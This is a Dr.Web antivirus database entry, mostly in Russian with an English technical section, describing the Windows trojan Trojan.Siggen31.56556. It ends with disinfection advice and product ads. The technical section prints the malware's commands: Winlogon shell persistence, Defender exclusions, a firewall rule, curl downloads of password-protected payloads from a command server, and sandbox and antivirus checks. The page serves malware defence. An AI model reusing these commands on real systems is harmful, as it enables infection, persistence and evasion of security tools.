Для корректной работы нашего сайта необходимо включить поддержку JavaScript в вашем браузере.
Trojan.Siggen31.56556
Добавлен в вирусную базу Dr.Web:
2025-09-16
Описание добавлено:
2025-09-17
Technical Information
To ensure autorun and distribution
Modifies the following registry keys
[HKLM\software\microsoft\windows nt\currentversion\winlogon] 'shell' = 'explorer.exe, "%LOCALAPPDATA%\google\chrome\user data\wzone.exe" "%LOCALAPPDATA%\google\chrome\user data\wtime.cmd" wloca...
Malicious functions
To complicate detection of its presence in the operating system,
adds antivirus exclusion:
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' add-mppreference -exclusionProcess '%LOCALAPPDATA%\google\chrome\user data\wzone.exe'
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' add-mppreference -exclusionPath '%LOCALAPPDATA%\google\chrome\user data\wzone.exe'
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' add-mppreference -exclusionProcess '%LOCALAPPDATA%\google\chrome\user data\windows driver foundation (wdf).exe'
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' add-mppreference -exclusionPath '%LOCALAPPDATA%\google\chrome\user data\windows driver foundation (wdf).exe'
Executes the following
'<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="windows defender" dir=in action=allow program="%LOCALAPPDATA%\google\chrome\user data\windows driver foundation (wdf).exe" enable=yes
Modifies file system
Creates the following files
Sets the 'hidden' attribute to the following files
%LOCALAPPDATA%\google\chrome\user data\01.txt
%LOCALAPPDATA%\google\chrome\user data\s01.txt
%LOCALAPPDATA%\google\chrome\user data\wtime.cmd
%LOCALAPPDATA%\google\chrome\user data\7z.dll
%LOCALAPPDATA%\google\chrome\user data\7z.exe
%LOCALAPPDATA%\google\chrome\user data\windows driver foundation (wdf).exe
%LOCALAPPDATA%\google\chrome\user data\wzone.exe
Network activity
Connects to
'ip##fo.io':443
'c.###titmp.net':443
'gi##ub.com':443
're#########ets.githubusercontent.com':443
'ze###tmp.net':443
TCP
Other
'ip##fo.io':443
'c.###titmp.net':443
'gi##ub.com':443
're#########ets.githubusercontent.com':443
UDP
DNS ASK ip##fo.io
DNS ASK c.###titmp.net
DNS ASK gi##ub.com
DNS ASK re#########ets.githubusercontent.com
DNS ASK ze###tmp.net
Miscellaneous
Creates and executes the following
'%TEMP%\qb0e172d.00\gkey.exe' gffrtr4erhfghfg
'%TEMP%\7z2201.exe' /S
'%ProgramFiles(x86)%\7-zip\7z.exe' x "%TEMP%\m.7z" -o"%LOCALAPPDATA%\Temp" -pconfigvpnG2012885838482012ggg -y
'%ProgramFiles(x86)%\7-zip\7z.exe' x "%TEMP%\NetFramework.4.8.7z" -o"%LOCALAPPDATA%\google\chrome\user data" -pvgfjyghtnhnlfjh7trhjfnhfg -y
'%LOCALAPPDATA%\google\chrome\user data\wzone.exe' "%LOCALAPPDATA%\google\chrome\user data\wtime.cmd" wlocale.cmd
'%LOCALAPPDATA%\google\chrome\user data\wzone.exe' "%LOCALAPPDATA%\google\chrome\user data\windows driver foundation (wdf).exe" -yr001
'%LOCALAPPDATA%\google\chrome\user data\windows driver foundation (wdf).exe' -yr001
Executes the following
'<SYSTEM32>\cmd.exe' /C start "" "%TEMP%\qb0E172D.00\gkey.exe" gffrtr4erhfghfg
'<SYSTEM32>\mode.com' 120, 31
'<SYSTEM32>\cmd.exe' /c ""%TEMP%\COCYNQKL.bat" "%TEMP%\qb0E172D.00\gkey.exe" gffrtr4erhfghfg"
'<SYSTEM32>\net.exe' session
'<SYSTEM32>\net1.exe' session
'<SYSTEM32>\cmd.exe' /c wmic path win32_LocalTime Get Day,Month,Year /value
'<SYSTEM32>\wbem\wmic.exe' path win32_LocalTime Get Day,Month,Year /value
'<SYSTEM32>\cmd.exe' /c reg query "hklm\system\currentcontrolset\control\systemInformation" /v "systemproductname"
'<SYSTEM32>\reg.exe' query "hklm\system\currentcontrolset\control\systemInformation" /v "systemproductname"
'<SYSTEM32>\cmd.exe' /c reg query "hklm\system\hardwareconfig\current" /v "systemproductname"
'<SYSTEM32>\reg.exe' query "hklm\system\hardwareconfig\current" /v "systemproductname"
'<SYSTEM32>\cmd.exe' /c tasklist /fi "imagename eq SbieSvc.exe" /fo csv /nh
'<SYSTEM32>\tasklist.exe' /fi "imagename eq SbieSvc.exe" /fo csv /nh
'<SYSTEM32>\reg.exe' query "HKLM\SOFTWARE\Microsoft\Alu" /s /reg:32
'<SYSTEM32>\reg.exe' Add "HKLM\SOFTWARE\Microsoft\Alu" /f /reg:32
'<SYSTEM32>\cmd.exe' /c reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SystemInformation" /v "SystemProductName"
'<SYSTEM32>\reg.exe' query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SystemInformation" /v "SystemProductName"
'<SYSTEM32>\cmd.exe' /c reg query "HKEY_LOCAL_MACHINE\SYSTEM\HardwareConfig\Current" /v "SystemProductName"
'<SYSTEM32>\reg.exe' query "HKEY_LOCAL_MACHINE\SYSTEM\HardwareConfig\Current" /v "SystemProductName"
'<SYSTEM32>\cmd.exe' /c tasklist /fi "imagename eq ekrn.exe" /fo csv /nh
'<SYSTEM32>\tasklist.exe' /fi "imagename eq ekrn.exe" /fo csv /nh
'<SYSTEM32>\cmd.exe' /c tasklist /fi "imagename eq QHActiveDefense.exe" /fo csv /nh
'<SYSTEM32>\tasklist.exe' /fi "imagename eq QHActiveDefense.exe" /fo csv /nh
'<SYSTEM32>\cmd.exe' /c curl https://ipinfo.io/ip -k
'<SYSTEM32>\curl.exe' https://ipinfo.io/ip -k
'<SYSTEM32>\cmd.exe' /c curl https://ipinfo.io/country -k
'<SYSTEM32>\curl.exe' https://ipinfo.io/country -k
'<SYSTEM32>\cmd.exe' /c ver
'<SYSTEM32>\cmd.exe' /S /D /c" ver "
'<SYSTEM32>\find.exe' "6.1"
'<SYSTEM32>\find.exe' "6.2"
'<SYSTEM32>\find.exe' "6.3"
'<SYSTEM32>\cmd.exe' /c curl -k https://c.zeltitmp.net/c01.php --user-agent "c010101"
'<SYSTEM32>\curl.exe' -k https://c.zeltitmp.net/c01.php --user-agent "c010101"
'<SYSTEM32>\curl.exe' -k -o "%TEMP%\7z2201.exe" -L -C - "https://github.com/ip7z/7zip/releases/download/22.01/7z2201.exe" --retry 3
'<SYSTEM32>\curl.exe' -k -o "%TEMP%\m.7z" -L "https://zeltitmp.net/pp/m.7z" --user-agent "cnfvp201"
'<SYSTEM32>\cmd.exe' /K "%TEMP%\m.bat"
'<SYSTEM32>\curl.exe' -k -o "%TEMP%\NetFramework.4.8.7z" -L -C - "https://zeltitmp.net/pp/NetFramework.4.8.7z" --user-agent "cnfvp201" --retry 3
'<SYSTEM32>\attrib.exe' +h +s "%LOCALAPPDATA%\google"
'<SYSTEM32>\reg.exe' add "hklm\software\microsoft\windows nt\currentversion\winlogon" /v "shell" /t reg_sz /d "explorer.exe, \"%LOCALAPPDATA%\google\chrome\user data\wzone.exe\" \"%LOCALAPPDATA%\google\chrome\user ...
'<SYSTEM32>\curl.exe' -k -L "https://zeltitmp.net/pp/cu/cu_p.php?ip=18#.#3.40.66&vos=10&cid=RU&sid=gd54&s=1" --user-agent "cnfvp201"
'<SYSTEM32>\cmd.exe' /c ""%LOCALAPPDATA%\google\chrome\user data\wtime.cmd" wlocale.cmd"
'<SYSTEM32>\ping.exe' -n 10 127.0.0.1
'<SYSTEM32>\ping.exe' -n 3 127.0.0.1
'<SYSTEM32>\cmd.exe' /c ""%TEMP%\COCYNQKL.bat" "%TEMP%\qb0E172D.00\gkey.exe" gffrtr4erhfghfg"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c ""%LOCALAPPDATA%\google\chrome\user data\wtime.cmd" wlocale.cmd"' (with hidden window)
'%LOCALAPPDATA%\google\chrome\user data\windows driver foundation (wdf).exe' -yr001' (with hidden window)
Рекомендации по лечению
Windows
macOS
Linux
Android
В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store .
Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light . Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
выключите устройство и включите его в обычном режиме.
Подробнее о Dr.Web для Android
Демо бесплатно на 14 дней
Выдаётся при установке
Поздравляем!
Обменяйте их на скидку до 50% на покупку Dr.Web.
Получить скидку
Скачайте Dr.Web для Android
Бесплатно на 3 месяца
Все компоненты защиты
Продление демо через AppGallery/Google Pay
Если Вы продолжите использование данного сайта, это означает, что Вы даете согласие на использование нами Cookie-файлов и иных технологий по сбору статистических сведений о посетителях. Подробнее
OK